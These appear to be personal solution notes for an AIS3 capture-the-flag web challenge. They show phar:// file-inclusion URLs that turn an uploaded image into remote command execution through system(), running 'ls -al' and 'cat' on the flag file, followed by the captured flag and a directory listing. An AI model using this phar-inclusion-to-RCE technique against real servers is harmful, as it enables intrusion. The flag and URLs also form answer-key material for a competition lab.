ref : 
	https://lightless.me/archives/include-file-from-zip-or-phar.html
	https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion

https://quiz.ais3.org:23545/images/220.132.34.101/iE1eHWpYj.jpg


https://quiz.ais3.org:23545/?p=phar://images/220.132.34.101/iE1eHWpYj.jpg#snoopy


https://quiz.ais3.org:23545/?p=phar://images/220.132.34.101/OgnapHt4J.jpg/fucksnoopy&e=system&f=ls -al

https://quiz.ais3.org:23545/?p=phar://images/220.132.34.101/OgnapHt4J.jpg/fucksnoopy&e=system&f=cat the_flag2_which_the_filename_you_can_not_guess_without_getting_the_shellllllll1l 

AIS3{RCEEEEEEEEE_is_soooooooooo_funnnnnnnnnnnn!?!!?!!!} 

total 48 drwxr-x--- 6 root web34 4096 Jun 26 15:23 . 
drwxr-x--- 4 root web34 4096 Jun 25 02:43 .. 
-rw-r----- 1 root web34 799 Jun 26 15:15 about.php 
drwxr-x--- 2 root web34 4096 Jun 25 02:43 css 
-rw-r----- 1 root web34 2658 Jun 26 15:15 header.php 
-rw-r----- 1 root web34 1079 Jun 26 15:15 home.php 
drwx-wx-wt 50 root web34 4096 Jul 5 09:49 images 
drwxr-x--- 2 root web34 4096 Jun 25 02:43 img 
-rw-r----- 1 root web34 605 Jun 26 15:15 index.php 
drwxr-x--- 2 root web34 4096 Jun 25 02:43 js 
-rw-r----- 1 root web34 56 Jun 26 15:15 the_flag2_which_the_filename_you_can_not_guess_without_getting_the_shellllllll1l -rw-r----- 1 root web34 1995 Jun 26 15:15 uploaddddddd.php 